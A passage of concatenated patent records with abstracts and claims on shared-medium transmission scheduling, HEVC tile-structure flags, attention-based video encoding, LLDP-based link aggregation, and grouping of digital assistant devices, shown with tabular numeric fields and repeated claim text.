computing the future transmission time as a function of the predicted arrival time of the next packet alone; computing the future transmission time as a function of the predicted arrival time of the next packet plus a parameter providing a minimum time between the arrival time of the next packet and the actual transmission of the next packet; computing the future transmission time as a function of the predicted arrival time of the next packet and the current time; and computing the future transmission time as a function of the predicted arrival time of the next packet and the transmission time of the current packet. 14. The communication device according to claim 11, wherein the processor is further configured to:
determine whether the next packet has arrived before a defined time period (Tdrop) prior to the planned future transmission time; and transmit the next packet in response to determining that the next packet has arrived before the Tdrop time period prior to the planned future transmission time of the next packet. 15. The communication device according to claim 14, wherein, in response to determining that the next packet has not arrived before the Tdrop time period prior to the planned future transmission time of the next packet, the processor is further configured to:
re-plan the future transmission time of the next packet; unbook the transmission resources for the planned future transmission time of the next packet; and book transmission resources for the re-planned future transmission time of the next packet. 16. The communication device according to claim 15, wherein the processor is further configured to notify other communication devices that the unbooked transmission resources are available for use by the other communication devices. 17. The communication device according to claim 16, wherein the processor is configured to notify the other communication devices by sending a control information packet at least the Tdrop time period before the planned future transmission time, the control information packet including:
an indicator for booking transmission resources for the re-planned future transmission time of the next packet; an indicator for informing the other communication devices that the communication device will not use the booked transmission resources for the planned future transmission time of the next packet; and a value indicating the planned future transmission time of the unbooked transmission resources. 18. The communication device according to claim 11, wherein the communication device is a wireless communication device. 19. A system for scheduling transmissions from a plurality of communication devices involved in a communication using a shared medium, the system comprising:
within each of the plurality of communication devices, an apparatus comprising:
a processor;
a non-transitory memory for storing instructions executable by the processor and for buffering packets to be transmitted; and
an interface connected to the processor for transmitting packets from the communication device;
wherein, when or after a current packet arrives in the memory, the processor is configured to execute the instructions in the memory, thereby causing the processor to:
predict an arrival time of a next packet for transmission;
plan a future transmission time of the next packet based on the predicted arrival time of the next packet;
book transmission resources for the planned future transmission time of the next packet; and
notify other communication devices of the booked transmission resources. 20. The system according to claim 19, wherein the processor within each of the plurality of communication devices is further configured to predict the arrival time of the next packet for transmission based on arrival times of N most recently received packets. 21. The system according to claim 19, wherein the processor within each of the plurality of communication devices is further configured to plan a future transmission time of the next packet utilizing a planning method selected from a group consisting of:
computing the future transmission time as a function of the predicted arrival time of the next packet alone; computing the future transmission time as a function of the predicted arrival time of the next packet plus a parameter providing a minimum time between the arrival time of the next packet and the actual transmission of the next packet; computing the future transmission time as a function of the predicted arrival time of the next packet and the current time; and computing the future transmission time as a function of the predicted arrival time of the next packet and the transmission time of the current packet. 22. The system according to claim 19, wherein the processor within each of the other communication devices is further configured to avoid transmitting at the planned future transmission time. 23. The system according to claim 19, wherein the processor within each of the plurality of communication devices is further configured to:
determine whether the next packet has arrived before a defined time period (Tdrop) prior to the planned future transmission time; and transmit the next packet in response to determining that the next packet has arrived before the Tdrop time period prior to the planned future transmission time of the next packet. 24. The system according to claim 23, wherein, in response to determining that the next packet has not arrived before the Tdrop time period prior to the planned future transmission time of the next packet, the processor within each of the plurality of communication devices is further configured to:
re-plan the future transmission time of the next packet; unbook the transmission resources for the planned future transmission time of the next packet; and book transmission resources for the re-planned future transmission time of the next packet. 25. The system according to claim 24, wherein the processor within each of the plurality of communication devices is further configured to notify the other communication devices that the unbooked transmission resources are available for use by the other communication devices. 26. The system according to claim 25, wherein the processor within each of the plurality of communication devices is configured to notify the other communication devices by sending a control information packet at least the Tdrop time period before the planned future transmission time, the control information packet including:
an indicator for booking transmission resources for the re-planned future transmission time of the next packet; an indicator for informing the other communication devices that the communication device will not use the booked transmission resources for the planned future transmission time of the next packet; and a value indicating the planned future transmission time of the unbooked transmission resources. 27. The system according to claim 19, wherein the plurality of communication devices are wireless communication devices. 28. A communication device within a plurality of communication devices involved in a communication using a shared medium, the communication device comprising:
a processor; a non-transitory memory for storing instructions executable by the processor; and an interface connected to the processor for communicating with other communication devices within the plurality of communication devices; wherein, the processor is configured to execute the instructions in the memory, thereby causing the processor to:
receive information about a planned transmission time by another communication device within the plurality of communication devices; and
avoid transmitting at the planned transmission time. | 2,400 |
9,137 | 9,137 | 14,391,092 | 2,482 | A method includes using a syntax element to indicate if tile information is the same for a sequence. The sequence is typically a bitstream for which one sequence parameter set (SPS) is valid. The syntax element can be part of the SPS or signaled such as in VUI or in an SEI message. Furthermore, the syntax element can be a flag, for example denoted tiles_fixed_structure_flag. The encoder decides how the pictures are divided by a tile structure enabling parallel encoding/decoding. When the same tile structure is used throughout a sequence, information that the same tile structure is used throughout a sequence of the video stream is sent to the decoder. | 1. A method for encoding a sequence of pictures of a video stream of multiple pictures to be performed in an encoder, the method comprises:
deciding whether all the pictures in said sequence are divided in the same way by tiles using a tile structure, and sending information that the same tile structure is used throughout the sequence of the video stream based on deciding the same tile structure is used throughout the sequence of the video stream. 2. The method according to claim 1, wherein the information that the same tile structure is used throughout the sequence of the video stream is sent by a flag. 3. The method according to claim 1, wherein the information that the same tile structure is used throughout the sequence of the video stream is sent in a syntax element tiles_fixed_structure_flag. 4. The method according to claim 3, wherein the syntax element is sent in a sequence parameter set, SPS. 5. The method according to claim 1, wherein the the deciding and the sending are performed by a High Efficiency Video Coding, HEVC, encoder. 6. A method for parsing a sequence of pictures of a video stream of multiple pictures to be performed in an element, the method comprises:
receiving information if the same tile structure is used throughout a sequence of the video stream, receiving the information indicating the same tile structure is used throughout the sequence of pictures of the video stream, and using said received information to control decoding of the sequence of the pictures of the video stream. 7. The method according to claim 6, wherein the information that the same tile structure is used throughout the sequence of the pictures of the video stream is received by a flag. 8. The method according to claim 6, wherein the information that the same tile structure is used throughout the sequence of the pictures of the video stream is received in a syntax element tiles_fixed_structure_flag. 9. The method according to claim 8, wherein the syntax element is received in a sequence parameter set, SPS. 10. The method according to claim 6, wherein the element is a network element or a decoder that is a High Efficiency Video Coding, HEVC, decoder. 11. An encoder for encoding a sequence of pictures of a video stream of multiple pictures, the encoder comprises:
a determining circuit configured to decide whether all the pictures in said sequence are divided in the same way by tiles using a tile structure, and an output circuit configured to send information of the tile structure which the current pictures is divided in, and to send information that the same tile structure is used throughout the sequence of the pictures of the video stream based on deciding that the same tile structure is used throughout the sequence of the pictures of the video stream. 12. The encoder according to claim 11, wherein the output circuit of the encoder is configured to send the information that the same tile structure is used throughout the sequence of the pictures of the video stream in a syntax element tiles_fixed_structure_flag. 13. The encoder according to claim 12, wherein the output circuit of the encoder is configured to send the syntax element in a sequence parameter set, SPS. 14. The encoder according to claim 11, wherein the output circuit is further configured to send the information that the same tile structure is used throughout a sequence of the pictures of the video stream during a session set-up. 15. The encoder according to claim 11, wherein the output circuit is further configured to signal entry points relative to each other, wherein the entry points indicates the first byte of the respective tile. 16. The encoder according to claim 11, wherein the encoder is a High Efficiency Video Coding, HEVC, encoder. 17. An element for parsing a sequence of pictures of a video stream of multiple pictures, the element comprises:
an input circuit configured to receive information of the tile structure which the current pictures is divided in, to receive the information if the same tile structure is used throughout a sequence of the pictures of the video stream, and a parsing circuit configured to parse and use said received information to control decoding of the sequence of the pictures of the video stream. 18. The element according to claim 17, wherein the input circuit of the element is configured to receive the information that the same tile structure is used throughout the sequence of the pictures of the video stream in a syntax element tiles_fixed_structure_flag. 19. The element according to claim 17, wherein the input unit of the element is configured to receive the syntax element in a sequence parameter set, SPS. 20. The element according to claim 17, wherein the input circuit is further configured to receive information that the same tile structure is used throughout a sequence of the pictures of the video stream during a session set-up. 21. The element according to claim 17, wherein the input circuit is further configured to receive information of entry points relative to each other, wherein the entry points indicates the first byte of the respective tile. 22. The element according to claim 17, wherein the element is a network element or a decoder that is a High Efficiency Video Coding, HEVC, decoder. 23. A transmitter comprising:
an encoder for encoding a sequence of pictures of a video stream of multiple pictures, the encoder comprises:
a determining circuit configured to decide whether all the pictures in said sequence are divided in the same way by tiles using a tile structure, and
an output circuit configured to send information of the tile structure which the current pictures is divided in, and to send the information that the same tile structure is used throughout the sequence of the pictures of the video stream when the same tile structure is used throughout the sequence of the video stream. 24. A receiver comprising:
an element for parsing a sequence of pictures of a video stream of multiple pictures, the element comprises:
an input circuit configured to receive information of the tile structure which the current pictures is divided in, to receive the information if the same tile structure is used throughout a sequence of the pictures of the video stream and a parsing configured to parse and use said received information to control decoding of the sequence of the pictures of the video stream. 25. A device comprising a transmitter according to claim 23. 26. A computer program product comprising a non-transitory computer readable medium containing, comprising computer readable code which when run on a processor causes the processor to:
decide whether all the pictures in a sequence of pictures of a video stream of multiple pictures are divided in the same way by tiles using a tile structure, and send information that the same tile structure is used throughout the sequence of the pictures of the video stream based on deciding the same tile structure is used throughout the sequence of the video stream. 27. (canceled) 28. A computer program product comprising a non-transitory computer readable medium containing computer readable code which when run on a processor causes the processor to:
receive information a sequence of pictures of a video stream of multiple pictures are divided in a same way by tiles using a same tile structure; receive the information indicating the same tile structure is used throughout the sequence of picture of the video stream; and use said received information to control decoding of the sequence of the pictures of the video stream. 29. (canceled) | A method includes using a syntax element to indicate if tile information is the same for a sequence. The sequence is typically a bitstream for which one sequence parameter set (SPS) is valid. The syntax element can be part of the SPS or signaled such as in VUI or in an SEI message. Furthermore, the syntax element can be a flag, for example denoted tiles_fixed_structure_flag. The encoder decides how the pictures are divided by a tile structure enabling parallel encoding/decoding. When the same tile structure is used throughout a sequence, information that the same tile structure is used throughout a sequence of the video stream is sent to the decoder.1. A method for encoding a sequence of pictures of a video stream of multiple pictures to be performed in an encoder, the method comprises:
deciding whether all the pictures in said sequence are divided in the same way by tiles using a tile structure, and sending information that the same tile structure is used throughout the sequence of the video stream based on deciding the same tile structure is used throughout the sequence of the video stream. 2. The method according to claim 1, wherein the information that the same tile structure is used throughout the sequence of the video stream is sent by a flag. 3. The method according to claim 1, wherein the information that the same tile structure is used throughout the sequence of the video stream is sent in a syntax element tiles_fixed_structure_flag. 4. The method according to claim 3, wherein the syntax element is sent in a sequence parameter set, SPS. 5. The method according to claim 1, wherein the the deciding and the sending are performed by a High Efficiency Video Coding, HEVC, encoder. 6. A method for parsing a sequence of pictures of a video stream of multiple pictures to be performed in an element, the method comprises:
receiving information if the same tile structure is used throughout a sequence of the video stream, receiving the information indicating the same tile structure is used throughout the sequence of pictures of the video stream, and using said received information to control decoding of the sequence of the pictures of the video stream. 7. The method according to claim 6, wherein the information that the same tile structure is used throughout the sequence of the pictures of the video stream is received by a flag. 8. The method according to claim 6, wherein the information that the same tile structure is used throughout the sequence of the pictures of the video stream is received in a syntax element tiles_fixed_structure_flag. 9. The method according to claim 8, wherein the syntax element is received in a sequence parameter set, SPS. 10. The method according to claim 6, wherein the element is a network element or a decoder that is a High Efficiency Video Coding, HEVC, decoder. 11. An encoder for encoding a sequence of pictures of a video stream of multiple pictures, the encoder comprises:
a determining circuit configured to decide whether all the pictures in said sequence are divided in the same way by tiles using a tile structure, and an output circuit configured to send information of the tile structure which the current pictures is divided in, and to send information that the same tile structure is used throughout the sequence of the pictures of the video stream based on deciding that the same tile structure is used throughout the sequence of the pictures of the video stream. 12. The encoder according to claim 11, wherein the output circuit of the encoder is configured to send the information that the same tile structure is used throughout the sequence of the pictures of the video stream in a syntax element tiles_fixed_structure_flag. 13. The encoder according to claim 12, wherein the output circuit of the encoder is configured to send the syntax element in a sequence parameter set, SPS. 14. The encoder according to claim 11, wherein the output circuit is further configured to send the information that the same tile structure is used throughout a sequence of the pictures of the video stream during a session set-up. 15. The encoder according to claim 11, wherein the output circuit is further configured to signal entry points relative to each other, wherein the entry points indicates the first byte of the respective tile. 16. The encoder according to claim 11, wherein the encoder is a High Efficiency Video Coding, HEVC, encoder. 17. An element for parsing a sequence of pictures of a video stream of multiple pictures, the element comprises:
an input circuit configured to receive information of the tile structure which the current pictures is divided in, to receive the information if the same tile structure is used throughout a sequence of the pictures of the video stream, and a parsing circuit configured to parse and use said received information to control decoding of the sequence of the pictures of the video stream. 18. The element according to claim 17, wherein the input circuit of the element is configured to receive the information that the same tile structure is used throughout the sequence of the pictures of the video stream in a syntax element tiles_fixed_structure_flag. 19. The element according to claim 17, wherein the input unit of the element is configured to receive the syntax element in a sequence parameter set, SPS. 20. The element according to claim 17, wherein the input circuit is further configured to receive information that the same tile structure is used throughout a sequence of the pictures of the video stream during a session set-up. 21. The element according to claim 17, wherein the input circuit is further configured to receive information of entry points relative to each other, wherein the entry points indicates the first byte of the respective tile. 22. The element according to claim 17, wherein the element is a network element or a decoder that is a High Efficiency Video Coding, HEVC, decoder. 23. A transmitter comprising:
an encoder for encoding a sequence of pictures of a video stream of multiple pictures, the encoder comprises:
a determining circuit configured to decide whether all the pictures in said sequence are divided in the same way by tiles using a tile structure, and
an output circuit configured to send information of the tile structure which the current pictures is divided in, and to send the information that the same tile structure is used throughout the sequence of the pictures of the video stream when the same tile structure is used throughout the sequence of the video stream. 24. A receiver comprising:
an element for parsing a sequence of pictures of a video stream of multiple pictures, the element comprises:
an input circuit configured to receive information of the tile structure which the current pictures is divided in, to receive the information if the same tile structure is used throughout a sequence of the pictures of the video stream and a parsing configured to parse and use said received information to control decoding of the sequence of the pictures of the video stream. 25. A device comprising a transmitter according to claim 23. 26. A computer program product comprising a non-transitory computer readable medium containing, comprising computer readable code which when run on a processor causes the processor to:
decide whether all the pictures in a sequence of pictures of a video stream of multiple pictures are divided in the same way by tiles using a tile structure, and send information that the same tile structure is used throughout the sequence of the pictures of the video stream based on deciding the same tile structure is used throughout the sequence of the video stream. 27. (canceled) 28. A computer program product comprising a non-transitory computer readable medium containing computer readable code which when run on a processor causes the processor to:
receive information a sequence of pictures of a video stream of multiple pictures are divided in a same way by tiles using a same tile structure; receive the information indicating the same tile structure is used throughout the sequence of picture of the video stream; and use said received information to control decoding of the sequence of the pictures of the video stream. 29. (canceled) | 2,400 |
9,138 | 9,138 | 15,916,616 | 2,488 | Disclosed are various embodiments for adjusting the encoding of a video signal into a video stream based on user attention. A first portion of a first video frame is encoded at a lower quality level than a second portion of the first video frame based, at least in part, on a rate of change of objects portrayed in the second portion. The first and second encoded portions are displayed in a second video frame. | 1. A system, comprising:
one or more processors; and memory to store computer-executable instructions that, if executed, cause the one or more processors to:
encode a first portion of a first video frame at a lower quality level than a second portion of the first video frame based, at least in part, on a rate of change of objects portrayed in the second portion; and
display the first and second encoded portions in a second video frame. 2. The system of claim 1, wherein the computer-executable instructions, if executed, further cause the one or more processors to detect the rate of change of objects portrayed in the second portion by comparing the first video frame with at least one previous video frame. 3. The system of claim 1, wherein the computer-executable instructions, if executed, further cause the one or more processors to detect the rate of change of objects portrayed in the second portion based, at least in part, on the first video frame and a stored profile associated with an application that generates a video signal that includes the first video frame. 4. The system of claim 1, wherein the computer-executable instructions, if executed, further cause the one or more processors to detect the rate of change of objects portrayed in the second portion based, at least in part, on receiving an event indication from an application that generates a video signal that includes the first video frame. 5. The system of claim 1, wherein the computer-executable instructions, if executed, further cause the one or more processors to predict that a user attention would be drawn to the second portion instead of the first portion due to the rate of change of objects portrayed in the second portion. 6. The system of claim 1, wherein the computer-executable instructions, if executed, further cause the one or more processors to predict that the rate of change of objects portrayed in the second portion is a saccade-inducing event. 7. A method, comprising:
encoding a first portion of a first video frame at a lower quality level than a second portion of the first video frame based, at least in part, on a rate of change of objects portrayed in the second portion; and displaying the first and second encoded portions in a second video frame. 8. The method of claim 7, further comprising determining that the rate of change of objects portrayed in the second portion meets one or more thresholds. 9. The method of claim 7, further comprising detecting the rate of change of objects portrayed in the second portion by comparing the first video frame with at least one previous video frame. 10. The method of claim 7, further comprising detecting the rate of change of objects portrayed in the second portion based, at least in part, on the first video frame and a stored profile associated with an application that generates a video signal that includes the first video frame. 11. The method of claim 7, further comprising detecting the rate of change of objects portrayed in the second portion based, at least in part, on receiving an event indication from an application that generates a video signal that includes the first video frame. 12. The method of claim 7, wherein the lower quality level is associated with at least one of: a lower resolution, a lower frame rate, a lower bitrate, or a lower color depth. 13. The method of claim 7, further comprising predicting that a user attention would be drawn to the second portion instead of the first portion due to the rate of change of objects portrayed in the second portion. 14. The method of claim 7, further comprising predicting that the rate of change of objects portrayed in the second portion is a saccade-inducing event. 15. The method of claim 7, wherein the first and second portions are distinct. 16. The method of claim 7, wherein the first portion includes all of the first video frame other than the second portion. 17. A non-transitory computer-readable medium storing computer-executable instructions that, if executed, cause one or more processors to:
encode a first portion of a first video frame at a lower quality level than a second portion of the first video frame based, at least in part, on a rate of change of objects portrayed in the second portion; and display the first and second encoded portions in a second video frame. 18. The non-transitory computer-readable medium of claim 17, wherein computer-executable instructions, if executed, further cause the one or more processors to predict that the rate of change of objects portrayed in the second portion is a saccade-inducing event. 19. The non-transitory computer-readable medium of claim 17, wherein the computer-executable instructions, if executed, further cause the one or more processors to detect the rate of change of objects portrayed in the second portion by comparing the first video frame with at least one previous video frame. 20. The non-transitory computer-readable medium of claim 17, wherein the computer-executable instructions, if executed, further cause the one or more processors to predict that a user attention would be drawn to the second portion instead of the first portion due to the rate of change of objects portrayed in the second portion. | Disclosed are various embodiments for adjusting the encoding of a video signal into a video stream based on user attention. A first portion of a first video frame is encoded at a lower quality level than a second portion of the first video frame based, at least in part, on a rate of change of objects portrayed in the second portion. The first and second encoded portions are displayed in a second video frame.1. A system, comprising:
one or more processors; and memory to store computer-executable instructions that, if executed, cause the one or more processors to:
encode a first portion of a first video frame at a lower quality level than a second portion of the first video frame based, at least in part, on a rate of change of objects portrayed in the second portion; and
display the first and second encoded portions in a second video frame. 2. The system of claim 1, wherein the computer-executable instructions, if executed, further cause the one or more processors to detect the rate of change of objects portrayed in the second portion by comparing the first video frame with at least one previous video frame. 3. The system of claim 1, wherein the computer-executable instructions, if executed, further cause the one or more processors to detect the rate of change of objects portrayed in the second portion based, at least in part, on the first video frame and a stored profile associated with an application that generates a video signal that includes the first video frame. 4. The system of claim 1, wherein the computer-executable instructions, if executed, further cause the one or more processors to detect the rate of change of objects portrayed in the second portion based, at least in part, on receiving an event indication from an application that generates a video signal that includes the first video frame. 5. The system of claim 1, wherein the computer-executable instructions, if executed, further cause the one or more processors to predict that a user attention would be drawn to the second portion instead of the first portion due to the rate of change of objects portrayed in the second portion. 6. The system of claim 1, wherein the computer-executable instructions, if executed, further cause the one or more processors to predict that the rate of change of objects portrayed in the second portion is a saccade-inducing event. 7. A method, comprising:
encoding a first portion of a first video frame at a lower quality level than a second portion of the first video frame based, at least in part, on a rate of change of objects portrayed in the second portion; and displaying the first and second encoded portions in a second video frame. 8. The method of claim 7, further comprising determining that the rate of change of objects portrayed in the second portion meets one or more thresholds. 9. The method of claim 7, further comprising detecting the rate of change of objects portrayed in the second portion by comparing the first video frame with at least one previous video frame. 10. The method of claim 7, further comprising detecting the rate of change of objects portrayed in the second portion based, at least in part, on the first video frame and a stored profile associated with an application that generates a video signal that includes the first video frame. 11. The method of claim 7, further comprising detecting the rate of change of objects portrayed in the second portion based, at least in part, on receiving an event indication from an application that generates a video signal that includes the first video frame. 12. The method of claim 7, wherein the lower quality level is associated with at least one of: a lower resolution, a lower frame rate, a lower bitrate, or a lower color depth. 13. The method of claim 7, further comprising predicting that a user attention would be drawn to the second portion instead of the first portion due to the rate of change of objects portrayed in the second portion. 14. The method of claim 7, further comprising predicting that the rate of change of objects portrayed in the second portion is a saccade-inducing event. 15. The method of claim 7, wherein the first and second portions are distinct. 16. The method of claim 7, wherein the first portion includes all of the first video frame other than the second portion. 17. A non-transitory computer-readable medium storing computer-executable instructions that, if executed, cause one or more processors to:
encode a first portion of a first video frame at a lower quality level than a second portion of the first video frame based, at least in part, on a rate of change of objects portrayed in the second portion; and display the first and second encoded portions in a second video frame. 18. The non-transitory computer-readable medium of claim 17, wherein computer-executable instructions, if executed, further cause the one or more processors to predict that the rate of change of objects portrayed in the second portion is a saccade-inducing event. 19. The non-transitory computer-readable medium of claim 17, wherein the computer-executable instructions, if executed, further cause the one or more processors to detect the rate of change of objects portrayed in the second portion by comparing the first video frame with at least one previous video frame. 20. The non-transitory computer-readable medium of claim 17, wherein the computer-executable instructions, if executed, further cause the one or more processors to predict that a user attention would be drawn to the second portion instead of the first portion due to the rate of change of objects portrayed in the second portion. | 2,400 |
9,139 | 9,139 | 15,877,026 | 2,477 | A computer network includes a server computer having communication ports that are wired to switch ports of two separate network switches. The network switches receive link layer discovery protocol (LLDP) packets from other network devices, and automatically aggregate corresponding switch ports into a port channel aggregation based on the contents of the LLDP packets. | 1. A computer network comprising:
a first network switch; a second network switch; and a third network switch having a first switch port that is linked to a first switch port of the first network switch over a first wired connection, the third network switch further having a second switch port that is linked to a first switch port of the second network switch over a second wired connection, wherein the first network switch is adapted to receive a link layer discovery protocol (LLDP) packet over the first wired connection, scan the LLDP packet for a network management type-length-value (TLV), and add the first switch port of the first network switch to a port channel aggregation that includes the first switch port of the second network switch in response to finding the network management TLV in the LLDP packet. 2. The computer network of claim 1, further comprising:
a server computer having a first communication port and a second communication port, wherein the first communication port of the server computer is linked to a second switch port of the first network switch by way of a third wired connection and the second communication port of the server computer is linked to a second switch port of the second network switch by way of a fourth wired connection. 3. The computer network of claim 2, wherein each of the first and second communication ports comprises a network interface card (NIC) port. 4. The computer network of claim 3, wherein each of the third and fourth wired connections comprises a backplane connection. 5. The computer network of claim 1, wherein the first wired connection comprises an Ethernet cable. 6. The computer network of claim 2, wherein the first network switch is adapted to extract the network management TLV from the LLDP packet, and decode the network management TLV to identify a system identifier associated with the port channel aggregation. 7. The computer network of claim 6, further comprising:
a network manager that is adapted to manage the first network switch and the second network switch, wherein the first network switch is adapted to extract the network management TLV from the LLDP packet, and decode the network management TLV to identify an identifier of the network manager. 8. The computer network of claim 7, wherein the first network switch and the second network switch are configured as peer network devices, with the first network switch being a primary switch and the second network switch being a secondary switch. 9. A computer-implemented method of automatically configuring a multi-chassis link aggregation in network switches, the method comprising:
receiving a link layer discovery protocol (LLDP) packet at a first switch port of a first network switch, the first switch port of the first network switch being connected to a first switch port of a second network switch; determining, from contents of the LLDP packet, that the second network switch and the first network switch are managed by a same network manager; and in response to determining that the first and second network switches are managed by the same network manager, adding the first switch port to a port channel aggregation. 10. The computer-implemented method of claim 9, wherein determining that the second network switch and the first network switch are managed by the same network manager comprises:
identifying a network management type-length-value (TLV) in the LLDP packet. 11. The computer-implemented method of claim 10, further comprising:
decoding the network management TLV to identify a system identifier of the first network switch. 12. The computer-implemented method of claim 11, further comprising:
decoding the network management TLV to identify an identifier of the network manager that manages the first and second network switches. 13. A network switch comprising:
a first switch port; a processor; and a memory that is configured to store instructions that when executed by the processor cause the network switch to: receive a link layer discovery protocol (LLDP) packet at the first switch port; determine, from contents of the LLDP packet, that the network switch and another network switch that sent the LLDP packet to the network switch are managed by a same network manager; and add the first switch port to a port channel aggregation in response to determining that the first and second network switches are managed by the same network manager. 14. The network switch of claim 13, wherein the instructions stored in the memory, when executed by the processor, further cause the network switch to:
extract a network management type-length-value (TLV) from the LLDP packet. 15. The network switch of claim 14, wherein the instructions stored in the memory, when executed by the processor, further cause the network switch to:
decode the network management TLV to identify a system identifier of the network switch. 16. The network switch of claim 15, wherein the instructions stored in the memory, when executed by the processor, further cause the network switch to:
decode the network management TLV to identify an identifier of the network manager. | A computer network includes a server computer having communication ports that are wired to switch ports of two separate network switches. The network switches receive link layer discovery protocol (LLDP) packets from other network devices, and automatically aggregate corresponding switch ports into a port channel aggregation based on the contents of the LLDP packets.1. A computer network comprising:
a first network switch; a second network switch; and a third network switch having a first switch port that is linked to a first switch port of the first network switch over a first wired connection, the third network switch further having a second switch port that is linked to a first switch port of the second network switch over a second wired connection, wherein the first network switch is adapted to receive a link layer discovery protocol (LLDP) packet over the first wired connection, scan the LLDP packet for a network management type-length-value (TLV), and add the first switch port of the first network switch to a port channel aggregation that includes the first switch port of the second network switch in response to finding the network management TLV in the LLDP packet. 2. The computer network of claim 1, further comprising:
a server computer having a first communication port and a second communication port, wherein the first communication port of the server computer is linked to a second switch port of the first network switch by way of a third wired connection and the second communication port of the server computer is linked to a second switch port of the second network switch by way of a fourth wired connection. 3. The computer network of claim 2, wherein each of the first and second communication ports comprises a network interface card (NIC) port. 4. The computer network of claim 3, wherein each of the third and fourth wired connections comprises a backplane connection. 5. The computer network of claim 1, wherein the first wired connection comprises an Ethernet cable. 6. The computer network of claim 2, wherein the first network switch is adapted to extract the network management TLV from the LLDP packet, and decode the network management TLV to identify a system identifier associated with the port channel aggregation. 7. The computer network of claim 6, further comprising:
a network manager that is adapted to manage the first network switch and the second network switch, wherein the first network switch is adapted to extract the network management TLV from the LLDP packet, and decode the network management TLV to identify an identifier of the network manager. 8. The computer network of claim 7, wherein the first network switch and the second network switch are configured as peer network devices, with the first network switch being a primary switch and the second network switch being a secondary switch. 9. A computer-implemented method of automatically configuring a multi-chassis link aggregation in network switches, the method comprising:
receiving a link layer discovery protocol (LLDP) packet at a first switch port of a first network switch, the first switch port of the first network switch being connected to a first switch port of a second network switch; determining, from contents of the LLDP packet, that the second network switch and the first network switch are managed by a same network manager; and in response to determining that the first and second network switches are managed by the same network manager, adding the first switch port to a port channel aggregation. 10. The computer-implemented method of claim 9, wherein determining that the second network switch and the first network switch are managed by the same network manager comprises:
identifying a network management type-length-value (TLV) in the LLDP packet. 11. The computer-implemented method of claim 10, further comprising:
decoding the network management TLV to identify a system identifier of the first network switch. 12. The computer-implemented method of claim 11, further comprising:
decoding the network management TLV to identify an identifier of the network manager that manages the first and second network switches. 13. A network switch comprising:
a first switch port; a processor; and a memory that is configured to store instructions that when executed by the processor cause the network switch to: receive a link layer discovery protocol (LLDP) packet at the first switch port; determine, from contents of the LLDP packet, that the network switch and another network switch that sent the LLDP packet to the network switch are managed by a same network manager; and add the first switch port to a port channel aggregation in response to determining that the first and second network switches are managed by the same network manager. 14. The network switch of claim 13, wherein the instructions stored in the memory, when executed by the processor, further cause the network switch to:
extract a network management type-length-value (TLV) from the LLDP packet. 15. The network switch of claim 14, wherein the instructions stored in the memory, when executed by the processor, further cause the network switch to:
decode the network management TLV to identify a system identifier of the network switch. 16. The network switch of claim 15, wherein the instructions stored in the memory, when executed by the processor, further cause the network switch to:
decode the network management TLV to identify an identifier of the network manager. | 2,400 |
9,140 | 9,140 | 15,666,712 | 2,424 | A computer implemented method, device and computer program device are provided that are under control of one or more processors configured with executable instructions. The method receives a user instruction to perform an action, identifies context awareness information concerning an environment where the action is to be performed. The environment includes a plurality of candidate electronic devices. At least one of the candidate electronic devices provides digital personal assistant (DPA) functionality. The method groups a collection of one or more responsive electronic devices, from the plurality of candidate electronic devices, based on the context awareness information. The method communicates the instruction to the collection of one or more responsive electronic devices to coordinate the action by the collection of one or more responsive electronic devices. | 1. A method, comprising:
under control of one or more processors configured with executable instructions; receiving a user instruction to perform an action; identifying context awareness information concerning an environment where the action is to be performed, the environment including a plurality of candidate electronic devices, at least one of the candidate electronic devices to provide digital personal assistant (DPA) functionality; grouping a collection of one or more responsive electronic devices, from the plurality of candidate electronic devices, based on the context awareness information; and communicating the instruction to the collection of one or more responsive electronic devices to coordinate the action by the responsive collection. 2. The method of claim 1, wherein the plurality of electronic devices include a DPA device, and wherein one or more of the identifying, grouping and communicating are performed by the DPA device. 3. The method of claim 2, further comprising determining whether to include the DPA device in the collection of one or more responsive electronic devices that perform the action. 4. The method of claim 1, wherein the context awareness information includes information indicative of a condition present in the environment in which the corresponding electronic devices are located. 5. The method of claim 1, wherein the collection of one or more responsive electronic devices include multiple DPA devices, and wherein the communicating the instruction includes coordinating an operation of the multiple DPA devices to act jointly in a manner perceived by one or more individuals within the environment. 6. The method of claim 5, wherein the environment represents a physical region in which the multiple DPA devices are located and in which the joint action is one or more of heard, seen, or felt by the one or more individuals. 7. The method of claim 1, wherein the identifying includes determining activity in a region surrounding a first electronic device from the plurality of electronic devices. 8. The method of claim 7, wherein the determining activity is based on one or more of calendar data, motion data, sleep habit data or device usage data. 9. The method of claim 1, further comprising identifying the plurality of candidate electronic devices based on availability on a network. 10. A device, comprising:
an input to receive a user instruction to perform an action; a processor; a memory storing program instructions accessible by the processor, wherein, responsive to execution of the program instructions, the processor performs the following:
identifying context awareness information concerning an environment where the action is to be performed, the environment including a plurality of candidate electronic devices, at least one of the candidate electronic devices to provide digital personal assistant (DPA) functionality; and
grouping a collection of one or more responsive electronic devices, from the plurality of candidate electronic devices, based on the context awareness information; and
a transceiver to communicate the instruction to the collection of one or more responsive electronic devices to perform the action by the responsive collection. 11. The device of claim 10, wherein the device is a DPA device. 12. The device of claim 11, the processor further to modify the instruction to include a device command to open a streaming channel and to play audio content that is streamed to the collection of one or more responsive electronic devices. 13. The device of claim 10, wherein the context awareness information includes information indicative of a condition present in the environment in which the corresponding electronic devices are located. 14. The device of claim 10, wherein the collection of one or more responsive electronic devices include multiple DPA devices, and wherein the transceiver sends the instruction to the multiple DPA devices to coordinate an operation of the multiple DPA devices to act jointly in a manner perceived by one or more individuals within the environment. 15. The device of claim 10, further comprising an activity or control circuit including one or more of a motion sensor, light switch, room thermostat, door locking circuit, or appliance to provide the context awareness information. 16. The device of claim 10, the processor to determine activity in a region surrounding a first electronic device from the plurality of electronic devices, the activity associated with the contact awareness information. 17. The device of claim 16, the processor to determine the activity based on one or more of calendar data, motion data, sleep habit data or device usage data. 18. A computer program product comprising a non-signal computer readable storage medium comprising computer executable code to:
